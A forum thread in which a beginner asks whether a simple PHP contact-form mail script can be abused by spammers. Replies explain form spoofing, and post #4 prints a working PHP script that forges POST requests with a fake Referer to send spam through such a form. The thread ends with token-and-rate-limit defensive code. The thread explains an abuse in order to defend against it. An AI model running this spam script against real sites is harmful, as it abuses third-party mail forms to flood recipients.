  1. #1
    SitePoint Zealot Blunderboy's Avatar

    simple email script insecure?

    Ok, noobie question here. Can the following simple email script be easily hacked? (eg abused by spammers?)
    The actual form is made in Flash.

    <?php

    $mail_to ="emailaddress@whateverblah.com";
    $mail_subject = "subject";
    $mail_body = "body stuff";

    if(mail($mail_to, $mail_subject, $mail_body))
    echo "Successfully sent e-mail \"$mail_subject\" to $mail_to.";
    else echo "Failed to send e-mail \"$mail_subject\"."
    ?>

  2. #2
    SitePoint Zealot
    You'll need some way of identifying if a user has submitted the form in x time. For example, I could spam that form by simply creating a new form, having it directed to the mail page, and using a cronjob to simply have it going at specified time intervals.

  3. #3
    SitePoint Zealot Blunderboy's Avatar
    Quote Originally Posted by gsoft
    You'll need some way of identifying if a user has submitted the form in x time. For example, I could spam that form by simply creating a new form, having it directed to the mail page, and using a cronjob to simply have it going at specified time intervals.
    Wait a minute, a new form directed to the mail page? Can you please explain how you would do that? I want to use this simple contact form on a website, but if it's so easy to hack then obviously I won't.

  4. #4
    PHP manual bot bronze trophy Gaheris's Avatar
    It doesn't even have to be a form. Someone who wanted to abuse this simply has to write a script which sends a POST request to your script.


    All he would have to do is send the request, for example like this.
    Even checking the referer wouldn't help since it has been faked.
    PHP Code:
    <?php
    $body  = 'This is our example spam mail';
    $topic = 'FREE stuff';
    $addresses = array(
        'foo@bar.com',
        'example@test.com',
        'spam@me.com'
    );

    foreach ($addresses as $email) {
        $fp = fsockopen('www.example.com', 80);
        if ($fp) {
            $query = 'email_body='.$body.'&email_to='.$email.'&email_subject='.$topic;
            $req   = "POST /scripts/email.php HTTP/1.0\r\n";
            $req  .= "Host: www.example.com\r\n";
            $req  .= "Referer: http://www.example.com/contact.html\r\n";
            $req  .= "Content-type: application/x-www-form-urlencoded\r\n";
            $req  .= "Content-length: ". strlen($query) ."\r\n";
            $req  .= "Connection: close\r\n\r\n";
            $req  .= $query;
            fwrite($fp, $req);

            $answer = '';
            while (!feof($fp)) {
                $answer .= fread($fp, 1024);
            }
            fclose($fp);
        } else {
            continue;
        }
        echo 'Successfully spammed ' . $email;
    }
    ?>

  5. #5
    SitePoint Zealot Blunderboy's Avatar
    So it looks like I shouldn't use such a script. But if I did use this on a site, and it was to get hacked by a spammer, am I then the one held responsible?

  6. #6
    ********* wombat firepages's Avatar
    When you display the form, do a loadvariables() call in Flash and load data from a .php file; in that file start a session with some unique value and pass it as a hidden field via your form; on the processing end check that the session id passed in the hidden field matches the one stored in the current session & off you go.

    of course nothing is foolproof.
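
The token check described in the last post, combined with the time limit suggested in the first reply, as an added example that is not part of the original thread. The names form_token, last_sent, MAIL_TO and MIN_INTERVAL and the recipient address are assumptions; the recipient is fixed in the script instead of being read from the request.

```php
<?php
// Added example, not code from the thread. form_token, last_sent, MAIL_TO and
// MIN_INTERVAL are assumed names; email_body is the field name used in post #4.
const MAIL_TO      = 'owner@example.com'; // fixed recipient, never read from the request
const MIN_INTERVAL = 60;                  // seconds between accepted mails per session

// Called when the Flash movie requests its variables, before the form is shown.
function issue_token(array &$session): string
{
    $session['form_token'] = bin2hex(random_bytes(32));
    return $session['form_token'];
}

// Returns null if the submission is acceptable, otherwise the reason it is not.
function check_submission(array &$session, array $post, int $now): ?string
{
    $expected = $session['form_token'] ?? '';
    $given    = $post['form_token'] ?? '';
    unset($session['form_token']); // single use: replaying the same POST fails
    if (!is_string($given) || $expected === '' || !hash_equals($expected, $given)) {
        return 'bad token';
    }
    if ($now - ($session['last_sent'] ?? 0) < MIN_INTERVAL) {
        return 'too soon';
    }
    $session['last_sent'] = $now;
    return null;
}

session_start();
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $reason = check_submission($_SESSION, $_POST, time());
    if ($reason === null) {
        $body = is_string($_POST['email_body'] ?? null) ? $_POST['email_body'] : '';
        $ok   = mail(MAIL_TO, 'Contact form message', $body);
        echo 'sent=' . ($ok ? '1' : '0');
    } else {
        http_response_code(400);
        echo 'sent=0&reason=' . urlencode($reason);
    }
} else {
    // GET: hand the token to Flash as a name=value pair for loadVariables().
    echo 'form_token=' . issue_token($_SESSION);
}
```

A client that requests a fresh session and token before every POST still passes both checks, so the fixed recipient is what keeps the script from mailing arbitrary addresses.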

